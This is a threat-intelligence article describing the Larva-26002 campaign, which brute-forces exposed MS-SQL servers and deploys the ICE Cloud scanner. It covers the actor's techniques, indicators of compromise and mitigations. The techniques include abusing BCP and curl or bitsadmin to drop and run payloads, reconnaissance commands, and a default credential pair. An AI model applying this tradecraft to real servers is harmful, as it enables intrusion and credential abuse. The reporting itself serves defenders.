A persistent threat actor known as Larva-26002 is actively targeting poorly secured Microsoft SQL servers to deploy a new scanner malware called ICE Cloud Client. The campaign represents a strategic shift from ransomware deployment to large-scale reconnaissance of vulnerable database infrastructure. 
Security analysts observed that the attackers repeatedly compromise the same exposed systems, indicating a long-term strategy focused on building a network of scanning nodes.
Evolution of the Campaign
The activity dates back to early 2024, when the group deployed ransomware on exposed database servers. Initial operations included:
- Trigona ransomware
- Mimic ransomware
- Remote access tools
- RDP port forwarding
Over time, the attackers transitioned from encryption attacks to infrastructure scanning.
Shift to Scanner Malware
In 2026, researchers observed the deployment of ICE Cloud, a scanner written in the Go programming language.
This replaces:
- Rust-based scanner used in 2025
- Earlier ransomware payloads
The new malware focuses on identifying additional vulnerable MS-SQL servers.
Long-Term Targeting Strategy
The group repeatedly attacks:
- Internet-exposed SQL servers
- Weak credential configurations
- Unpatched database systems
Compromised systems are then used to scan other databases, creating a growing reconnaissance network.
Infection Mechanism
The attack begins when exposed MS-SQL servers are identified.
The attacker:
- Performs brute-force login attempts
- Runs system profiling commands
- Deploys malware using SQL utilities
Common reconnaissance commands include:
- hostname
- whoami
- netstat -an
These help attackers understand system privileges and network connectivity.
Abuse of BCP Utility
Attackers exploit the legitimate Bulk Copy Program utility to drop malware.
The process:
- Malware stored in database table
- Exported using BCP command
- Saved locally as api.exe
- Executed on host
This technique helps bypass some security controls.
Alternative Delivery Methods
If BCP fails, attackers use:
- PowerShell
- Curl
- Bitsadmin
These tools download the payload directly from remote infrastructure.
ICE Cloud Malware Execution
The infection chain includes two stages:
- ICE Cloud Launcher
- ICE Cloud Client
The launcher:
- Connects to command server
- Downloads scanner component
- Executes client under random filename
This helps evade detection.
Scanner Functionality
Once active, ICE Cloud:
- Registers with command server
- Receives target SQL server list
- Attempts credential login
- Reports successful access
Example credentials used include default combinations like:
- ecomm / ecomm
This indicates automated brute-force scanning.
Indicators of Attribution
Researchers observed:
- Turkish-language strings
- Emoji characters in binary
- Similar infrastructure to earlier campaigns
These clues link the activity to previous Mimic ransomware operations.
Why This Campaign Is Dangerous
The shift to scanning suggests attackers are:
- Mapping vulnerable databases
- Building access inventory
- Preparing future attacks
- Expanding botnet-like infrastructure
This reconnaissance phase could precede ransomware or data theft campaigns.
Indicators of Compromise
Security teams should watch for:
- Unexpected BCP activity
- api.exe in ProgramData directory
- Suspicious outbound connections
- Unusual SQL authentication attempts
- Random executable filenames
Mitigation Recommendations
Database administrators should:
- Use strong SQL credentials
- Restrict internet exposure
- Implement firewall rules
- Monitor SQL login attempts
- Update endpoint protection
Additional Defensive Steps
Organizations should:
- Disable unnecessary SQL features
- Monitor PowerShell execution
- Audit database access logs
- Block unknown outbound traffic
- Apply regular patching
Key Takeaways
- Larva-26002 targeting exposed MS-SQL servers
- ICE Cloud scanner deployed
- Shift from ransomware to reconnaissance
- BCP utility abused for malware delivery
- Immediate database hardening required
Conclusion
The Larva-26002 campaign highlights a growing trend where attackers pivot from ransomware to stealthy reconnaissance. By compromising poorly secured MS-SQL servers and deploying ICE Cloud scanners, threat actors are building a foundation for future attacks. Organizations must secure database infrastructure and monitor for unusual SQL activity to reduce exposure.
